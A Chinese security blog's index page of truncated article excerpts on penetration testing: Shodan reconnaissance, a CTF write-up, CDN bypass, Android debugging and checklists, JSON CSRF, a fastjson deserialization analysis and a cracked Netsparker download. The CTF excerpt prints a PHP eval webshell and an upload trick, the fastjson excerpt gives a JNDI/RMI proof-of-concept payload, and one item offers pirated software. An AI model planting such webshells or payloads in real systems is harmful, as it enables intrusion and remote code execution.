Shodan使用方法技巧 – Shodan在渗透测试及漏洞挖掘中的一些用法 渗透测试中,第一阶段就是信息搜集,这一阶段完成的如何决定了你之后的进行是否顺利,是否更容易。而关于信息收集的文章网上也是有太多。今天我们来通过一些例子来讲解如何正确使用Shodan这一利器。 想要利用好这一利器,首先得知道他是什么,Shodan是一款网络空间搜索引擎,和我们常见的百度谷歌不同,他主要搜索的是存在于互联网中的设备,服务器、摄像头、工控设备、智能家居等,都是他的目标... 2017年11月30日 文章转载 暂无评论 喜欢 5 阅读 14,571 views 次 阅读全文
安恒杯2018年10月月赛WriteUp Web 手速要快 打开给了个登录框要密码。密码在消息头里就给出了。 登陆后要上传文件: 上传个一句话木马上去: $ cat 1.jpg <?php @eval($_POST['h']);?> 在bp里改成1.php.jpg后上传成功: 可以看到已经getshell: flag在上一级目录里: easy audit 打开给了一串随机数,并告诉有一些有趣的方法在flag.php里。F12查看源码提示了index.php?func1: ... 2018年12月19日 文章转载 暂无评论 喜欢 0 阅读 4,838 views 次 阅读全文
绕过CDN寻找真实IP的8种方法 正常情况下,通过cmd命令可以快速找到域名对应IP,最常见的命令如ping、nslookup。但很多站点出于用户体验和安全的角度,使用CDN加速,将域名解析到CDN,这时候就需要绕过CDN来查找真实IP。 一、DNS历史解析记录 查询域名的历史解析记录,可能会找到网站使用CDN前的解析记录,从而获取真实ip,相关查询的网站有: iphistory:https://viewdns.info/iphistory/DNS查询:(https://dnsdb.io/zh-cn/... 2020年05月25日 文章转载 暂无评论 喜欢 3 阅读 13,503 views 次 阅读全文
13. 使用IDA进行动态调试与过反调试(上)(三 1|0前言 前几篇介绍了Android的静态调试,这篇文章着重讲解一下使用IDA对Dalvik指令,so文件的调试,在Android越来越成熟的阶段,越来越多的app 本系列一共五篇: 《Smali基础语法总结》 《静态+动态分析Android程序(一)》 《JNI静态注册和动态注册》(二) 《使用IDA对so文件进行动态调试与过反调试(三)》 《hook与注入(四)》 《Android文件保护技术(五)》 2|0调试基础 2|1什么是so文件 Android... 2021年04月07日 文章转载 暂无评论 喜欢 2 阅读 15,044 views 次 阅读全文
阿里云OSS约等于文件上传漏洞? 首先声明这是一篇标题党的文章,阿里云OSS不被这个锅,锅其实还是在企业或者说是用户。 前言 之所以要写这篇口水文,是因为最近在检测自家公司产品时发现存在这个问题,同时不久在测试某src的某系统时也存在类似这种问题,所以个人认为还是要提高一些警惕,让开发或测试者尽量消除不必要的麻烦,不要错误的认为文件托管在oss就可以忽略站内的上传功能存在的安全隐患。 概述 首先借用阿里云oss首页的介绍性... 2019年11月21日 文章转载 暂无评论 喜欢 1 阅读 3,212 views 次 阅读全文
Android漏洞checklist Android漏洞checklist 程序可被任意调试 风险描述:安卓AndroidManifest.xml文件中android:debuggable为true。 危害描述:app可以被任意调试。 修复建议:AndroidManifest.xml 配置文件中中设置为android:Debugable=”false”。 参考链接:https://developer.android.com/guide/topics/manifest/application-element.html#debug 程序数据任意备份 风险描述:安卓AndroidManifest.xml文件中android: all... 2019年04月12日 文章转载 暂无评论 喜欢 1 阅读 3,893 views 次 阅读全文
RealWorld|应急引发的规模性红队反制案例 作者:狗哥、Superdong、Dm、主任 说明 本文未有过多的技术细节,主要讲述了近期在某省级攻防演练中因一个电话引起的一次日行千里的应急事件,以及如何溯源反制某公司既当裁判又当红队的安服人员,进而引发如何批量反制攻击手。 01 事件详情 晚上突然接到客户的电话,说在攻防演练期间被打的很惨,需要回血和加分。由于时间紧迫,无法第一时间赶到现场,于是先远程登录到涉事的服务器进行简单的排查。确定... 2023年10月08日 文章转载 暂无评论 喜欢 0 阅读 13,655 views 次 阅读全文
JSON CSRF的一个案例-附利用链接 这是最近的一个真实案例,所以某些地方对进行打码处理,算作对json csrf的一点研究吧,废话不多说,进入正题 对一个SDK进行渗透测试过程中发现,发现POST请求的data都使用json格式进行数据传输,该做的校验和过滤都做了,权限也做了很好的控制,难道就没问题了?感觉此处应该存在CSRF问题的,但是由于post的内容是json格式,而且对Content-Type也进行了限制,如下图: 尝试一、常规思路利用构造了如下代码... 2018年09月19日 原创文章 暂无评论 喜欢 1 阅读 6,704 views 次 阅读全文
密码保护:fastjson =< 1.2.47 反序列化漏洞浅析 poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之... 2019年07月11日 文章转载 要查看留言请输入您的密码。 喜欢 2 阅读 4,510 views 次 阅读全文
Netsparker4.9.1.16896最新官方破解版 本文提供的破解方式仅供软件试用,请于24小时内删除 Netsparker是一个便于使用的Web应用漏洞扫描工具,可以爬行、攻击并识别各种Web应用中存在的漏洞。能识别的Web应用漏洞包括SQL注入、XSS(跨网站指令码)、命令注入、本地文件包含和任意文件读取、远程文件包含、框架注入、内部路径信息披露等。 不同于其它漏洞扫描工具,Netsparker具有相当低的误报率,因为Netsparker执行多次测试以确认任何被识别的漏... 2018年01月29日 实用工具 暂无评论 喜欢 1 阅读 3,352 views 次 阅读全文